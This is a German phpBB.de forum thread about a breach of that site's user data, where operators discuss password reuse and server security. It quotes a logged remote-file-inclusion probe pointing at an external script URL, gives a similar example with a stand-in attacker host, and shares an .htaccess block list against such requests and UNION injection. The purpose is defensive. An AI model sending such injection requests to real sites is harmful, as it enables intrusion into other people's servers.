Diskussion zu Benutzerdaten auf phpBB.de ausspioniert

[Gairigo]

Es wird leider immer wieder NICHT gelesen oder nur HALB gelesen.
Ist denn eigentlich schon jemand auf die Idee gekommen dass nur der Zugang zur Datenbank gehackt wurde?

Wenn ich daran denke dass letztes Jahr sogar mysql.org gehackt wurde und 4 Tage tot war, was soll da dann das ganze meckern hier.
Bei MySql sind hochbezahlte Spitzenkräfte am Werk um die Server am laufen zu halten.
Wer hat denn dann seine MySql Datenbank gelöscht.?

Fragt doch mal euren Hoster wie Sicher euere Datenbank ist.

Wer von euch hat schon einen root Server den er sein eigen nennt?

Ich leiste wo anders Support und wenn ich da sehe dass Leute ihre kompletten Serverzugangsdaten posten, aus Unwissenheit heraus dann wird es mir anders.

Ich finde die Leute die hier den Server Administrieren habe Ihren Job super gemacht und auf die paar Herrn Besserwisser kann man wie überall gut verzichten.

Das einzige was dann wirklich hilft ist den Server komplett zu schließen, nur eben dann ist auch nichts mehr Online zu lesen.

Muki

Ich stimme Muki da vollkommen zu!

Allerdings bin ich nach dem Durchlesen von inzwischen ca. 37 Threadseiten zu diesem Thema zu der Erkenntnis gelangt, dass es scheinbar zukünftig notwendig sein müsste und sollte, dass nicht jeder Hans und Franz ein Forum eröffnen dürfte. Derjenige der ein Forum betreiben möchte sollte erst einmal einen Administrator-Führerschein beantragen, durchführen und dann vor allem dann auch bestehen. Erst danach dürfte derjenige dann ein Board mit Daten von Usern betreiben.

Jede Wette: 80% aller Foren-Betreiber die hier sorry, aber depperte Beiträge verfasst haben würden niemals einen Foren-, Administrator-Führerschein bestehen.

Wie heist es so schön: Ein Auto kaufen und dieses dann in eine Garage fahren zu können sind eben zwei Paar Schuhe!

Und nein: Die Betreiber von phpbb.de sind damit ganz sicher NICHT von mir gemeint!

[RubberDuck]

Jede Wette: 80% aller Foren-Betreiber die hier sorry, aber depperte Beiträge verfasst haben würden niemals einen Foren-, Administrator-Führerschein bestehen.

"Foren-, Administrator-Führerschein" ? Der war jetzt wirklich gut! Das hat den frühen Morgen jetzt wieder gerettet

Die Leute die jetzt rumschreien geben bei Gewinnspielen für irgendwelche Plastikdosen oder 3-Wochen-Gratis-Abos des Hintertupfinger-Wochenblatt mehr persönliche Daten ein, als hier jetzt abgezogen wurden.

Aber last sie schreien ... Wir werden das nicht ändern.

[Markus76]

So, ich auch mal was sagen

Wer wirklich in zig Foren und beim E-Mailaccount usw. das gleiche Paßwort benutzt, der handelt schon grob fahrlässig.

Schon alleine wenn man Forenbetreiber ist, sollte man doch etwas Sicherheitsbewusstsein haben...

Ich selbst prüfe alle 14-Tage stichprobenartig meine Serverlogs und habe neulich auch diese netten:

Code: Alles auswählen

"GET /././viewforum.php?f=122&st=0&sk=t&sd=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F&start=0&sid=270775443f74759cfac1d6ce4470f3eb HTTP/1.0" 200 17291 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

Zeilen gefunden.

Kurzerhand werden solche IP-Ranges dann gesperrt und jut. Im Obigen Fall: 207-36-196-46.primarydns.com

[Divebaer]

für die admins zwecks ermittlung evtl Interessant.

in meinem anderen Board was noch unter phpBB 2.0.22 läuft hat mein C-Back Cracker Tracker

am 02.02.08 = 4 Angriffe
am 03.02.08 = 5 Angriffe
und
am 05.02.08 erneut 5 Angriffe registriert und einschl IP geloggt.

PS: allesamt Worm& Exploid Protection geloggt und diesbezüglich fanden nur diese 14 Angriffe in den letzten 3 Tagen statt seit ca. 1,5 Jahren in denen das Board steht.

[Gairigo]

"Foren-, Administrator-Führerschein" ? Der war jetzt wirklich gut! Das hat den frühen Morgen jetzt wieder gerettet

Die Leute die jetzt rumschreien geben bei Gewinnspielen für irgendwelche Plastikdosen oder 3-Wochen-Gratis-Abos des Hintertupfinger-Wochenblatt mehr persönliche Daten ein, als hier jetzt abgezogen wurden.

Aber last sie schreien ... Wir werden das nicht ändern.

Moin RubberDuck

Suuuuuuuuuper - Top!

Genauso wie Du es beschrieben hast, ist es!

Kein 10 Zeilen Code Mod einbauen können, aber hier Dünnpfiff posten was mit dem hier im Thread leidigen Vorfall (bei welchem doch leider die phpbb.de Betreiber in 1ter Linie betroffen sind) in keinster weise etwas zu tun hat.

Kein Hacker hat ein Hack-Interesse an einem Hobby-Board mit z.b. 20 Usern und 220 Beiträgen wo es um Stabilität von LED-Leuchten an einem Golf Heckspoiler geht!

[Divebaer]

seh ich genauso Rubberduck, und auf die paar Spammails weiter kommt es auch nicht an, die fallen doch bei der alltäglichen Werbeflut gar nicht mehr auf.

[tas2580]

@Divebaer solche Angriffsversuche sind ganz normal und haben mit der Sache hier ziemlich sicher nichts zutun. Es gibt Bots die den ganzen Tag nichts anderes machen wie zu versuchen irgendwelche Scripte über bekannte Lücken anzugreifen. Ich habe bei meinen Foren hunderte solcher Versuche jeden Tag. Abhilfe dagegen schafft z.B. der Code den Nickvergessen weiter oben gepostet hat, aber auch ohne das ist man mit einer aktuellen phpBB Version recht sicher. Was nützt schon ein exploit für ein Wiki in einem phpBB? Die Dummen Bots merken nur nicht das es sich um ein phpBB handelt und versuchen es trotzdem. Das was du in deinen Logfiles siehst ist das ganz normale Rauschen des Internets.

[Gairigo]

Schon alleine wenn man Forenbetreiber ist, sollte man doch etwas Sicherheitsbewusstsein haben...

Genau, deswg. plädiere ich ja auch für einen Foren-Betreiber, Foren-Administrator Führerschein.

Wer mit den Daten fremder Personen nicht sicherheitsbewußt umgehen kann, der dürfte aus meiner Sicht auch kein Forum betreiben in welchem Fremde ihre persöhnlichen Daten wie Passwort und Emailadresse etc. etc. eingeben und als dann dort sicher hinterlegt betrachten.

Jeder neue/angehende Mitarbeiter für z.B. die Gepäckbehandlung auf enem Flughafen muss eine Sicherheits-Qualifikation nachweisen/ablegen. Und diejenigen dort haben nicht mal etwas mit dem Inhalt der Gepäckstücke zu tun. Die sehen wenn, dann nur bunte Köfferchen.

Aber jeder Hänschen und Fränzchen kann ein Forum betreiben und persöhnliche Daten Dritter einsammeln. Er kann zwar kein Server-Log lesen/auswerten und ist/stellt damit die Sicherheitslücke selber dar!

[Divebaer]

Danke Tobi für die Info

wundert mich halt nur weil grad so verstärkt in den letzten Tagen und bisher noch nie geloggt.

Wie schaut das beim phpBB3 aus ? c-back unterstützt bislang nur die 2er Version gibt es was ähnliches oder habt Ihr da im 3er schon was eingebaut bzw. einen anderen mod dafür ?

[tas2580]

Das geht irgendwann mal los wenn das Forum von den Bots gefunden wird. Wahrscheinlich wirst du in Zukunft noch mehr so Einträge finden.

Das 3er ist von Haus aus schon sehr stark auf Sicherheit getrimmt und auch für phpBB2.0.22 gibt es keine bekannten Sicherheitslücken, es besteht also kein Grund zur Sorge wenn man keine unsicheren Mods eingebaut hat.

Ein Schutz der aber recht gut gegen die meisten Angriffsversuche hilft und unschöne Einträge im Log vermeidet währe wie weiter oben schon gepostet ein Eintrag in der .htaccess, vorausgesetzt der Server unterstützt mod_rewrite

Code: Alles auswählen

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)=http://(.*) [OR]
RewriteCond %{QUERY_STRING} (.*)=https://(.*) [OR]
RewriteCond %{QUERY_STRING} (.*)=ftp://(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)UNION(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)SQL_INJECTION(.*)
RewriteRule (.*) http://127.0.0.1 [L,R=301]

Das verhindert das Sachen wie domain.tld?mode=http://crackerseite.tld/böses-script.txt aufgerufen und so durch eine Sicherheitslücke ausgeführt werden können. Alle solchen versuche werden einfach zu dem Rechner der versucht hat das aufzurufen zurück geleitet.

Desweiteren sollte man sein Adminpasswort gut wählen, wenn du bei mir im Forum das gleiche Login wie in deinem Forum verwendest könnte ich so recht leicht an deine Daten kommen, aber das dürfte ja eh jedem der kurz überlegt klar sein.